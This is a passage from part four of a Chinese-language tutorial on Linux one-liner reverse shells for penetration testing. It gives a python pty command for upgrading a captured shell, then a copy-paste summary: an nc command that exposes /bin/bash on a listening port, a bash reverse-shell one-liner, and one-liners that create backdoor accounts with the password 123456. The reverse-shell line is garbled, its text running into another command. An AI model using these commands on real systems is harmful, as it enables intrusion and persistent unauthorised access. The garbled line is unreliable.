「干货」Linux环境下一句话反弹shell总结( 四 )

3.2 python 标准虚拟终端获取
我们通过各种方式获取的shell经常不稳定或者没有交互界面的原因 , 往往都是因为我们获取的shell不是标准的虚拟终端 , 此时我们其实可以借助于python来获取一个标准的虚拟终端环境 。
python在现在一般发行版Linux系统中都会自带 , 所以使用起来也较为方便 , 即使没有安装 , 我们手动安装也很方便 。
3.2.1 python 一句话获取标准shell
使用python 一句话获取标准shell的具体命令如下:
# python -c "import pty;pty.spawn('/bin/bash')"命令详解:python 默认就包含有一个pty的标准库 。
「干货」Linux环境下一句话反弹shell总结文章插图
3.2.2 实例演示
具体(1)开启监听;(2)反弹shell;(3)会话建立的过程这里不在重复演示了 , 这里直接贴出笔者获取到反弹shell后的问题后 , 如何通过python获取标准shell的过程截图展现如下 。
「干货」Linux环境下一句话反弹shell总结文章插图
虽然到目前为止写的虚拟终端并没有原生终端那样好,但是花点时间去折腾然后不断的去完善.相信会做的更好.
大家可能在渗透测试的时候会发现有些时候系统的命令终端是不允许直接访问的,那么这个时候用Python虚拟化一个终端相信会让你眼前一亮.
四、写在最后最后将上面学习的内容做一下小结 , 以方便日后可以直接复制粘贴使用 , 笔者贴心不 , 你就说贴心补贴(ou tu bu zhi …)
4.1 nc开启本地监听发布bash服务
# nc -lvvp 12345 -t -e /bin/bash4.2 常用反弹shell一句话
(1) bash 反弹一句话
# bash -i >pty.spawn('/bin/bash')"4.5 linux 一句话添加账户
(1)chpasswd 方法
# useradd guest;echo 'guest:123456'|chpasswd(2)useradd -p 方法
# useradd -p `openssl passwd 123456` guest(3)echo -e 方法
# useradd test;echo -e "123456n123456n" |passwd test学习参考
【「干货」Linux环境下一句话反弹shell总结】转载自:


推荐阅读